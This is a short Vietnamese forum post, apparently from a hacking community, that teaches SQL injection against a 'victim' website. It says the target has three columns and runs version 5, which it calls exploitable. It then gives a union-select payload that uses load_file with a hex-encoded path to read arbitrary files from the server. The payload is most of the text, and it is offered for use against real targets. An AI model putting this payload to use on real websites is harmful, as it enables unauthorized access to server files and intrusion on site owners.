Victim thuộc loại này hơi bị khó tìm nên đọc tham khảo thôi nhé :khakha:
Victim: domain/@/index.php?id=1099 <~ link xàm nhé :D
Ví dụ website này có 3 trường, version 5 (có thể khai thác)
1. Đọc file
- domain/@/index.php?id=-1099 union select 1,load_FILE(0xđường_dẫn_file_cần_đọc),3 #...